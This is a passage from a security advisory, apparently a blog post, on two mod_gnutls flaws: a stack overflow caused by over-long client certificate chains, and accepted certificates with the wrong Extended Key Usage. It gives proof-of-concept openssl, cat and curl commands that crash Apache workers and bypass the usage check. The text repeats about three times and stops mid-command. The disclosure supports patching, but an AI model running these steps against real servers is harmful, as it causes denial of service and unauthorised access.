mod_gnutls Multiple Vulnerabilities

Multiple critical vulnerabilities have been identified in the mod_gnutls Apache module, specifically CVE-2026-33307 and CVE-2026-33308. The first vulnerability involves a stack-based buffer overflow during client certificate chain processing, potentially allowing remote attackers to trigger a denial of service (DoS) condition by sending malformed certificate chains. Although stack protection mechanisms mitigate full exploitation, repeated requests can exhaust server resources. The second vulnerability concerns improper certificate validation, where certificates with incorrect Extended Key Usage are accepted for mTLS client authentication. This could enable attackers to reuse compromised server certificates for unauthorized client access. Administrators running affected versions, such as 0.12.0 on Fedora 42, should prioritize patching these issues to prevent service disruption and unauthorized authentication bypasses. Immediate mitigation involves updating mod_gnutls to a patched version and reviewing certificate validation policies to ensure strict adherence to Extended Key Usage requirements across all mTLS implementations.

mod_gnutls Multiple Vulnerabilities Multiple vulnerabilities exist in mod_gnutls. CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5) A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain - the same certificate can be used multiple times. Proof of Concept: The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0. 1. The attacker generates a self-signed certificate: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj "/CN=self-signed-cert" Please note there are no particular requirements for the contents of this certificate. 2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above: cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain .pem 3. The attacker initiates an mTLS connection using the crafted certificate chain: curl https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem 4. The following entry can be found in the /var/log/httpd/error_log file on the server: *** stack smashing detected ***: terminated [...] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening. This attack can be easily amplified by the attacker by making a number of requests: curl https://<hostname> https://<hostname> https://<hostname> https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place. CVE-2026-33308 Improper Certificate Validation CVSS:3.1/ AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8) A client certificate with incorrect Extended Key Usage (EKU) is accepted. If the attackers compromise a certificate (with the associated private key) issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication. Proof of Concept: The attacker makes a HTTPS request using a separately acquired private key and certificate chain: curl https://<hostname> -k --key key.pem --cert not-client-cert-chain.pem Ben Smith Fri, 03/20/2026 - 09:11

Multiple critical vulnerabilities have been identified in the mod_gnutls Apache module, specifically CVE-2026-33307 and CVE-2026-33308. The first vulnerability involves a stack-based buffer overflow during client certificate chain processing, potentially allowing remote attackers to trigger a denial of service (DoS) condition by sending malformed certificate chains. Although stack protection mechanisms mitigate full exploitation, repeated requests can exhaust server resources. The second vulnerability concerns improper certificate validation, where certificates with incorrect Extended Key Usage are accepted for mTLS client authentication. This could enable attackers to reuse compromised server certificates for unauthorized client access. Administrators running affected versions, such as 0.12.0 on Fedora 42, should prioritize patching these issues to prevent service disruption and unauthorized authentication bypasses. Immediate mitigation involves updating mod_gnutls to a patched version and reviewing certificate validation policies to ensure strict adherence to Extended Key Usage requirements across all mTLS implementations. mod_gnutls Multiple Vulnerabilities Multiple vulnerabilities exist in mod_gnutls. CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5) A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain - the same certificate can be used multiple times. Proof of Concept: The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0. 1. The attacker generates a self-signed certificate: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj "/CN=self-signed-cert" Please note there are no particular requirements for the contents of this certificate. 2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above: cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain .pem 3. The attacker initiates an mTLS connection using the crafted certificate chain: curl https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem 4. The following entry can be found in the /var/log/httpd/error_log file on the server: *** stack smashing detected ***: terminated [...] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening. This attack can be easily amplified by the attacker by making a number of requests: curl https://<hostname> https://<hostname> https://<hostname> https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place. CVE-2026-33308 Improper Certificate Validation CVSS:3.1/ AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8) A client certificate with incorrect Extended Key Usage (EKU) is accepted. If the attackers compromise a certificate (with the associated private key) issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication. Proof of Concept: The attacker makes a HTTPS request using a separately acquired private key and certificate chain: curl https://<hostname> -k --key key.pem --cert not-client-cert-chain.pem Ben Smith Fri, 03/20/2026 - 09:11 mod_gnutls Multiple Vulnerabilities Multiple vulnerabilities exist in mod_gnutls. CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5) A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain - the same certificate can be used multiple times. Proof of Concept: The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0. 1. The attacker generates a self-signed certificate: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj "/CN=self-signed-cert" Please note there are no particular requirements for the contents of this certificate. 2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above: cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain .pem 3. The attacker initiates an mTLS connection using the crafted certificate chain: curl https:// -k --key key.pem --cert...